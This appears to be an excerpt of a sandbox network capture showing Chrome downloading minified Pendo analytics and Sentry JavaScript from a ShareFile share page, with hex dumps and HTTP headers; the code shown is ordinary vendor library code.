                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC471INData Raw: 63 64 30 0d 0a 2f 2f 20 50 65 6e 64 6f 20 41 67 65 6e 74 20 57 72 61 70 70 65 72 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 50 65 6e 64 6f 2e 69 6f 2c 20 49 6e 63 2e 0a 2f 2f 20 45 6e 76 69 72 6f 6e 6d 65 6e 74 3a 20 20 20 20 70 72 6f 64 75 63 74 69 6f 6e 0a 2f 2f 20 41 67 65 6e 74 20 56 65 72 73 69 6f 6e 3a 20 20 32 2e 32 35 33 2e 31 0a 2f 2f 20 49 6e 73 74 61 6c 6c 65 64 3a 20 20 20 20 20 20 32 30 32 34 2d 31 31 2d 30 35 54 31 39 3a 31 35 3a 32 38 5a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 50 65 6e 64 6f 43 6f 6e 66 69 67 29 20 7b 0a 2f 2a 0a 40 6c 69 63 65 6e 73 65 20 68 74 74 70 73 3a 2f 2f 61 67 65 6e 74 2e 70 65 6e 64 6f 2e 69 6f 2f 6c 69 63 65 6e 73 65 73 0a 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 72 77 2c 6f 77 2c 61 77 29 7b 21 66 75 6e
                                                                                                                                                                                                                      Data Ascii: cd0// Pendo Agent Wrapper// Copyright 2024 Pendo.io, Inc.// Environment: production// Agent Version: 2.253.1// Installed: 2024-11-05T19:15:28Z(function (PendoConfig) {/*@license https://agent.pendo.io/licenses*/!function(rw,ow,aw){!fun
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 73 2c 65 2c 74 29 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 6f 3d 65 7c 7c 30 2c 61 3d 28 74 3c 30 3f 72 2b 74 3a 74 7c 7c 72 29 2d 28 6f 3d 30 3c 3d 6f 3f 6f 3a 72 2b 6f 29 3b 69 66 28 30 3c 61 29 69 66 28 69 3d 6e 65 77 20 41 72 72 61 79 28 61 29 2c 74 68 69 73 2e 63 68 61 72 41 74 29 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 2e 63 68 61 72 41 74 28 6f 2b 6e 29 3b 65 6c 73 65 20 66 6f 72 28 6e 3d 30 3b 6e 3c 61 3b 6e 2b 2b 29 69 5b 6e 5d 3d 74 68 69 73 5b 6f 2b 6e 5d 3b 72 65 74 75 72 6e 20 69 7d 7d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e
                                                                                                                                                                                                                      Data Ascii: s,e,t);var n,i=[],r=this.length,o=e||0,a=(t<0?r+t:t||r)-(o=0<=o?o:r+o);if(0<a)if(i=new Array(a),this.charAt)for(n=0;n<a;n++)i[n]=this.charAt(o+n);else for(n=0;n<a;n++)i[n]=this[o+n];return i}}String.prototype.trim||(String.prototype.trim=function(){return
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 72 6e 20 6e 65 77 20 6c 28 21 30 29 2e 75 70 64 61 74 65 28 65 29 5b 74 5d 28 29 7d 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 61 28 22 68 65 78 22 29 3b 28 74 3d 69 3f 63 28 74 29 3a 74 29 2e 63 72 65 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 6c 7d 2c 74 2e 75 70 64 61 74 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 2e 63 72 65 61 74 65 28 29 2e 75 70 64 61 74 65 28 65 29 7d 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 65 29 7b 76 61 72 20 6e 3d 72 5b 65 5d 3b 74 5b 6e 5d 3d 61 28 6e 29 7d 72 65 74 75 72 6e 20 74 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 65 76 61 6c 28 22 72 65 71 75 69 72 65 28 27 63 72 79 70 74 6f 27 29
                                                                                                                                                                                                                      Data Ascii: rn new l(!0).update(e)[t]()}},d=function(){var t=a("hex");(t=i?c(t):t).create=function(){return new l},t.update=function(e){return t.create().update(e)};for(var e=0;e<r.length;++e){var n=r[e];t[n]=a(n)}return t},c=function(t){var n=eval("require('crypto')
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC60INData Raw: 3e 3e 36 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 3a 28 74 3c 35 35 32 39 36 7c 7c 35 37 33 34 34 3c 3d 74 3f 61 5b 6e 3e 3e 32 5d 7c 3d 28 32 32 34 7c 74 3e 3e 31 32 29 3c 3c 75 5b 0d 0a
                                                                                                                                                                                                                      Data Ascii: >>6)<<u[3&n++]:(t<55296||57344<=t?a[n>>2]|=(224|t>>12)<<u[
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 31 30 30 30 0d 0a 33 26 6e 2b 2b 5d 3a 28 74 3d 36 35 35 33 36 2b 28 28 31 30 32 33 26 74 29 3c 3c 31 30 7c 31 30 32 33 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 2b 2b 72 29 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 32 34 30 7c 74 3e 3e 31 38 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 31 32 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 74 3e 3e 36 26 36 33 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 2c 61 5b 6e 3e 3e 32 5d 7c 3d 28 31 32 38 7c 36 33 26 74 29 3c 3c 75 5b 33 26 6e 2b 2b 5d 29 3b 74 68 69 73 2e 6c 61 73 74 42 79 74 65 49 6e 64 65 78 3d 6e 2c 74 68 69 73 2e 62 79 74 65 73 2b 3d 6e 2d 74 68 69 73 2e 73 74 61 72 74 2c 36 34 3c 3d 6e 3f 28 74 68 69 73 2e 62 6c 6f 63 6b 3d
                                                                                                                                                                                                                      Data Ascii: 10003&n++]:(t=65536+((1023&t)<<10|1023&e.charCodeAt(++r)),a[n>>2]|=(240|t>>18)<<u[3&n++],a[n>>2]|=(128|t>>12&63)<<u[3&n++]),a[n>>2]|=(128|t>>6&63)<<u[3&n++]),a[n>>2]|=(128|63&t)<<u[3&n++]);this.lastByteIndex=n,this.bytes+=n-this.start,64<=n?(this.block=
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 35 39 37 37 35 33 39 33 2b 61 5b 73 5d 3c 3c 30 29 3c 3c 35 7c 6f 3e 3e 3e 32 37 29 2b 28 74 5e 28 6e 3d 6e 3c 3c 33 30 7c 6e 3e 3e 3e 32 29 5e 69 29 2b 72 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 31 5d 3c 3c 30 29 3c 3c 35 7c 72 3e 3e 3e 32 37 29 2b 28 6f 5e 28 74 3d 74 3c 3c 33 30 7c 74 3e 3e 3e 32 29 5e 6e 29 2b 69 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 32 5d 3c 3c 30 29 3c 3c 35 7c 69 3e 3e 3e 32 37 29 2b 28 72 5e 28 6f 3d 6f 3c 3c 33 30 7c 6f 3e 3e 3e 32 29 5e 74 29 2b 6e 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 33 5d 3c 3c 30 29 3c 3c 35 7c 6e 3e 3e 3e 32 37 29 2b 28 69 5e 28 72 3d 72 3c 3c 33 30 7c 72 3e 3e 3e 32 29 5e 6f 29 2b 74 2b 31 38 35 39 37 37 35 33 39 33 2b 61 5b 73 2b 34 5d 3c 3c 30 2c 69 3d 69 3c 3c 33 30 7c 69 3e
                                                                                                                                                                                                                      Data Ascii: 59775393+a[s]<<0)<<5|o>>>27)+(t^(n=n<<30|n>>>2)^i)+r+1859775393+a[s+1]<<0)<<5|r>>>27)+(o^(t=t<<30|t>>>2)^n)+i+1859775393+a[s+2]<<0)<<5|i>>>27)+(r^(o=o<<30|o>>>2)^t)+n+1859775393+a[s+3]<<0)<<5|n>>>27)+(i^(r=r<<30|r>>>2)^o)+t+1859775393+a[s+4]<<0,i=i<<30|i>
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1348INData Raw: 6f 5b 6e 3e 3e 31 32 26 31 35 5d 2b 6f 5b 6e 3e 3e 38 26 31 35 5d 2b 6f 5b 6e 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 6e 5d 2b 6f 5b 69 3e 3e 32 38 26 31 35 5d 2b 6f 5b 69 3e 3e 32 34 26 31 35 5d 2b 6f 5b 69 3e 3e 32 30 26 31 35 5d 2b 6f 5b 69 3e 3e 31 36 26 31 35 5d 2b 6f 5b 69 3e 3e 31 32 26 31 35 5d 2b 6f 5b 69 3e 3e 38 26 31 35 5d 2b 6f 5b 69 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 69 5d 2b 6f 5b 72 3e 3e 32 38 26 31 35 5d 2b 6f 5b 72 3e 3e 32 34 26 31 35 5d 2b 6f 5b 72 3e 3e 32 30 26 31 35 5d 2b 6f 5b 72 3e 3e 31 36 26 31 35 5d 2b 6f 5b 72 3e 3e 31 32 26 31 35 5d 2b 6f 5b 72 3e 3e 38 26 31 35 5d 2b 6f 5b 72 3e 3e 34 26 31 35 5d 2b 6f 5b 31 35 26 72 5d 7d 2c 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 6c 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                                                      Data Ascii: o[n>>12&15]+o[n>>8&15]+o[n>>4&15]+o[15&n]+o[i>>28&15]+o[i>>24&15]+o[i>>20&15]+o[i>>16&15]+o[i>>12&15]+o[i>>8&15]+o[i>>4&15]+o[15&i]+o[r>>28&15]+o[r>>24&15]+o[r>>20&15]+o[r>>16&15]+o[r>>12&15]+o[r>>8&15]+o[r>>4&15]+o[15&r]},l.prototype.toString=l.prototype
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 31 37 30 30 0d 0a 29 7b 72 65 74 75 72 6e 22 65 78 74 65 6e 73 69 6f 6e 22 3d 3d 3d 65 2e 69 6e 73 74 61 6c 6c 54 79 70 65 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 72 65 74 75 72 6e 21 46 28 65 29 26 26 21 4d 28 65 29 26 26 7a 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 46 28 65 29 26 26 50 28 65 29 26 26 74 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 5b 5d 29 3b 66 6f 72 28 76 61 72 20 74 3d 2f 5e 68 74 74 70 73 3a 5c 2f 5c 2f 5b 5c 77 5c 2d 2e 5d 2a 63 64 6e 5b 5c 77 5c 2d 2e 5d 2a 5c 2e 28 70 65 6e 64 6f 2d 64 65 76 5c 2e 63 6f 6d 7c 70 65 6e 64 6f 5c 2e 69 6f 29 5c 2f 61 67 65 6e 74 5c 2f 73 74 61 74 69 63 5c 2f 28 5b 5c 77 5d 7b 38 7d 2d 5b 5c 77 5d 7b 34 7d 2d 5b
                                                                                                                                                                                                                      Data Ascii: 1700){return"extension"===e.installType}function D(e){return!F(e)&&!M(e)&&z(e)}function G(e,t){return!F(e)&&P(e)&&t}function U(e){void 0===e&&(e=[]);for(var t=/^https:\/\/[\w\-.]*cdn[\w\-.]*\.(pendo-dev\.com|pendo\.io)\/agent\/static\/([\w]{8}-[\w]{4}-[
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 28 65 29 29 7b 65 3d 42 28 65 2c 21 30 2c 6e 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 56 28 74 29 2c 63 65 28 65 2c 74 29 2c 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 65 2c 74 2c 6e 29 7b 69 66 28 47 28 65 2c 6e 29 29 7b 65 3d 42 28 65 2c 21 31 2c 6e 29 3b 69 66 28 65 29 72 65 74 75 72 6e 20 56 28 74 29 2c 63 65 28 65 2c 74 29 2c 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 64 65 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 73 65 28 65 2c 74 2c 6e 29 7c 7c 75 65 28 65 2c 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6f 77 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 2c 74 3d 28 6e 5b 22 61 73 79 6e 63 22 5d 3d 21 30 2c 6e 2e 73 72 63 3d 78 65
                                                                                                                                                                                                                      Data Ascii: (e)){e=B(e,!0,n);if(e)return V(t),ce(e,t),!0}return!1}function ue(e,t,n){if(G(e,n)){e=B(e,!1,n);if(e)return V(t),ce(e,t),!0}return!1}function de(e,t,n){return se(e,t,n)||ue(e,t,n)}function ce(e,t){var n=ow.createElement("script"),t=(n["async"]=!0,n.src=xe
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1378INData Raw: 65 4f 66 22 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 2c 22 74 6f 53 74 72 69 6e 67 22 2c 22 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 22 2c 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 22 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 22 5d 2c 56 3d 4d 61 74 68 2e 70 6f 77 28 32 2c 35 33 29 2d 31 3b 66 75 6e 63 74 69 6f 6e 20 63 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 6e 75 6c 6c 3d 3d 6f 3f 72 2e 6c 65 6e 67 74 68 2d 31 3a 2b 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 4d 61 74 68 2e 6d 61 78 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 6f 2c 30 29 2c 74 3d 41 72 72 61 79 28 65 29 2c 6e 3d 30 3b 6e 3c 65 3b 6e 2b 2b 29 74 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 2b 6f 5d 3b 73 77 69 74
                                                                                                                                                                                                                      Data Ascii: eOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],V=Math.pow(2,53)-1;function c(r,o){return o=null==o?r.length-1:+o,function(){for(var e=Math.max(arguments.length-o,0),t=Array(e),n=0;n<e;n++)t[n]=arguments[n+o];swit


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      12192.168.2.174972213.248.193.2514437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1272OUTGET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1
                                                                                                                                                                                                                      Host: averellharriman.sharefile.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Referer: https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      Cookie: AWSALBTG=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALBTGCORS=V4Uy/vVBcH1KZLJdU1G/GZuvhpTkAwVKo4BSkkEwiKndEcp2fmKOLA+obOjdnruGE8q8vIC9PE9kD99pBerMAWOeOkTPQtGEWKiKFDNWl/PVIymzs0TOpij+BDM/x07yTEult5lpPkSbNdvGAPh0Sg1cwPPZ3NyNJN1fQdKUgL2I; AWSALB=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R; AWSALBCORS=G7T03R2S2KszJi0/6BTjZcVJzhKk1LdzYpO5txWiAg9B//nwV86yVu/xCPh1piTnQN/5Ck6WUZJhliVeDzDB1AaZyIeSPTIYQlWDTtTQ2wA4E3q0qWyFKtDUXZ3R
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1431INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:05 GMT
                                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                                      Content-Length: 310527
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Set-Cookie: AWSALBTG=EhbnCdp2674iUdAi0tzEBMd9KKHhUXjjPbW/07O1friWg2FQBD9drbCQoAOhrmgOjtNxnVhM7Umo1CSGVySSgN6Pb+FaOlLAAoA2zbnlaJGLzeePfMgc/4I9ePoGIkm93RWt4xWPn0jYDYp2jCfeG11aFpF0RFAIoufgUDnFGoAB; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBTGCORS=EhbnCdp2674iUdAi0tzEBMd9KKHhUXjjPbW/07O1friWg2FQBD9drbCQoAOhrmgOjtNxnVhM7Umo1CSGVySSgN6Pb+FaOlLAAoA2zbnlaJGLzeePfMgc/4I9ePoGIkm93RWt4xWPn0jYDYp2jCfeG11aFpF0RFAIoufgUDnFGoAB; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Set-Cookie: AWSALB=HPaRlb9XNhPMHa8/hEmODeucIk/UL0IkAlr3X0d7FS0Nxd/JlJDAT9O5k7ur/rFR4O1EKsTOvWA1ckFRYkQlogVPChLPKs2LgcpqMgDn/aKNEE5o6YxQQaKSSZsq; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/
                                                                                                                                                                                                                      Set-Cookie: AWSALBCORS=HPaRlb9XNhPMHa8/hEmODeucIk/UL0IkAlr3X0d7FS0Nxd/JlJDAT9O5k7ur/rFR4O1EKsTOvWA1ckFRYkQlogVPChLPKs2LgcpqMgDn/aKNEE5o6YxQQaKSSZsq; Expires=Tue, 12 Nov 2024 19:36:05 GMT; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Cache-Control: no-store, must-revalidate, no-cache, private
                                                                                                                                                                                                                      Content-Language: en
                                                                                                                                                                                                                      ETag: "1db2f60e568937f"
                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                      Last-Modified: Tue, 05 Nov 2024 08:58:35 GMT
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Referrer-Policy: same-origin
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      Strict-Transport-Security: max-age=16000000;includeSubDomains;preload
                                                                                                                                                                                                                      X-XSS-Protection: 1;mode=block
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC14953INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 68 61 72 65 66 69 6c 65 64 65 76 5f 73 68 61 72 65 66 69 6c 65 5f 61 70 70 73 68 65 6c 6c 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 33 36 30 5d 2c 7b 33 31 33 36 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 72 28 65 29 2c 6e 2e 64 28 65 2c 7b 42 72 65 61 64 63 72 75 6d 62 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 6f 7d 2c 42 72 6f 77 73 65 72 43 6c 69 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 41 73 7d 2c 42 72 6f 77 73 65 72 50 72 6f 66 69 6c 69 6e 67
                                                                                                                                                                                                                      Data Ascii: "use strict";(self.webpackChunk_sharefiledev_sharefile_appshell=self.webpackChunk_sharefiledev_sharefile_appshell||[]).push([[1360],{31360:function(t,e,n){n.r(e),n.d(e,{Breadcrumbs:function(){return Do},BrowserClient:function(){return As},BrowserProfiling
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC1431INData Raw: 64 75 72 61 74 69 6f 6e 3d 65 2e 64 75 72 61 74 69 6f 6e 3b 65 6c 73 65 7b 63 6f 6e 73 74 20 65 3d 74 2e 74 69 6d 65 73 74 61 6d 70 2d 74 2e 73 74 61 72 74 65 64 3b 74 2e 64 75 72 61 74 69 6f 6e 3d 65 3e 3d 30 3f 65 3a 30 7d 65 2e 72 65 6c 65 61 73 65 26 26 28 74 2e 72 65 6c 65 61 73 65 3d 65 2e 72 65 6c 65 61 73 65 29 2c 65 2e 65 6e 76 69 72 6f 6e 6d 65 6e 74 26 26 28 74 2e 65 6e 76 69 72 6f 6e 6d 65 6e 74 3d 65 2e 65 6e 76 69 72 6f 6e 6d 65 6e 74 29 2c 21 74 2e 69 70 41 64 64 72 65 73 73 26 26 65 2e 69 70 41 64 64 72 65 73 73 26 26 28 74 2e 69 70 41 64 64 72 65 73 73 3d 65 2e 69 70 41 64 64 72 65 73 73 29 2c 21 74 2e 75 73 65 72 41 67 65 6e 74 26 26 65 2e 75 73 65 72 41 67 65 6e 74 26 26 28 74 2e 75 73 65 72 41 67 65 6e 74 3d 65 2e 75 73 65 72 41 67 65
                                                                                                                                                                                                                      Data Ascii: duration=e.duration;else{const e=t.timestamp-t.started;t.duration=e>=0?e:0}e.release&&(t.release=e.release),e.environment&&(t.environment=e.environment),!t.ipAddress&&e.ipAddress&&(t.ipAddress=e.ipAddress),!t.userAgent&&e.userAgent&&(t.userAgent=e.userAge
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 2d 39 61 2d 66 5d 7b 33 32 7d 29 3f 2d 3f 28 5b 30 2d 39 61 2d 66 5d 7b 31 36 7d 29 3f 2d 3f 28 5b 30 31 5d 29 3f 5b 20 5c 5c 74 5d 2a 24 22 29 3b 66 75 6e 63 74 69 6f 6e 20 43 74 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 65 3d 74 2e 6d 61 74 63 68 28 54 74 29 3b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3b 72 65 74 75 72 6e 22 31 22 3d 3d 3d 65 5b 33 5d 3f 6e 3d 21 30 3a 22 30 22 3d 3d 3d 65 5b 33 5d 26 26 28 6e 3d 21 31 29 2c 7b 74 72 61 63 65 49 64 3a 65 5b 31 5d 2c 70 61 72 65 6e 74 53 61 6d 70 6c 65 64 3a 6e 2c 70 61 72 65 6e 74 53 70 61 6e 49 64 3a 65 5b 32 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 74 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 43 74 28 74 29 2c 72 3d 77 74 28 65 29 2c 7b 74 72 61 63 65 49 64 3a 73
                                                                                                                                                                                                                      Data Ascii: -9a-f]{32})?-?([0-9a-f]{16})?-?([01])?[ \\t]*$");function Ct(t){if(!t)return;const e=t.match(Tt);if(!e)return;let n;return"1"===e[3]?n=!0:"0"===e[3]&&(n=!1),{traceId:e[1],parentSampled:n,parentSpanId:e[2]}}function It(t,e){const n=Ct(t),r=wt(e),{traceId:s
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 3b 72 65 74 75 72 6e 20 65 3f 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 6e 61 6d 65 3a 22 6e 75 6c 6c 20 70 72 6f 74 6f 74 79 70 65 22 7d 28 65 29 3b 72 65 74 75 72 6e 2f 5e 48 54 4d 4c 28 5c 77 2a 29 45 6c 65 6d 65 6e 74 24 2f 2e 74 65 73 74 28 73 29 3f 60 5b 48 54 4d 4c 45 6c 65 6d 65 6e 74 3a 20 24 7b 73 7d 5d 60 3a 60 5b 6f 62 6a 65 63 74 20 24 7b 73 7d 5d 60 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 60 2a 2a 6e 6f 6e 2d 73 65 72 69 61 6c 69 7a 61 62 6c 65 2a 2a 20 28 24 7b 74 7d 29 60 7d 76 61 72 20 72 7d 28 74 2c 65 29 3b 69 66 28 21 63 2e 73 74 61 72 74 73 57 69 74 68 28 22 5b 6f 62 6a 65 63 74 20 22 29 29 72 65 74 75 72 6e 20 63 3b 69 66 28 65 2e 5f 5f 73 65 6e 74 72 79
                                                                                                                                                                                                                      Data Ascii: Object.getPrototypeOf(t);return e?e.constructor.name:"null prototype"}(e);return/^HTML(\w*)Element$/.test(s)?`[HTMLElement: ${s}]`:`[object ${s}]`}catch(t){return`**non-serializable** (${t})`}var r}(t,e);if(!c.startsWith("[object "))return c;if(e.__sentry
                                                                                                                                                                                                                      2024-11-05 19:36:05 UTC16384INData Raw: 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 6f 70 74 69 6f 6e 73 3d 74 2c 74 68 69 73 2e 5f 69 6e 74 65 67 72 61 74 69 6f 6e 73 3d 7b 7d 2c 74 68 69 73 2e 5f 69 6e 74 65 67 72 61 74 69 6f 6e 73 49 6e 69 74 69 61 6c 69 7a 65 64 3d 21 31 2c 74 68 69 73 2e 5f 6e 75 6d 50 72 6f 63 65 73 73 69 6e 67 3d 30 2c 74 68 69 73 2e 5f 6f 75 74 63 6f 6d 65 73 3d 7b 7d 2c 74 68 69 73 2e 5f 68 6f 6f 6b 73 3d 7b 7d 2c 74 68 69 73 2e 5f 65 76 65 6e 74 50 72 6f 63 65 73 73 6f 72 73 3d 5b 5d 2c 74 2e 64 73 6e 3f 74 68 69 73 2e 5f 64 73 6e 3d 62 6e 28 74 2e 64 73 6e 29 3a 4b 26 26 4e 2e 77 61 72 6e 28 22 4e 6f 20 44 53 4e 20 70 72 6f 76 69 64 65 64 2c 20 63 6c 69 65 6e 74 20 77 69 6c 6c 20 6e 6f 74 20 73 65 6e 64 20 65 76 65 6e 74 73 2e 22 29 2c 74
                                                                                                                                                                                                                      Data Ascii: constructor(t){if(this._options=t,this._integrations={},this._integrationsInitialized=!1,this._numProcessing=0,this._outcomes={},this._hooks={},this._eventProcessors=[],t.dsn?this._dsn=bn(t.dsn):K&&N.warn("No DSN provided, client will not send events."),t
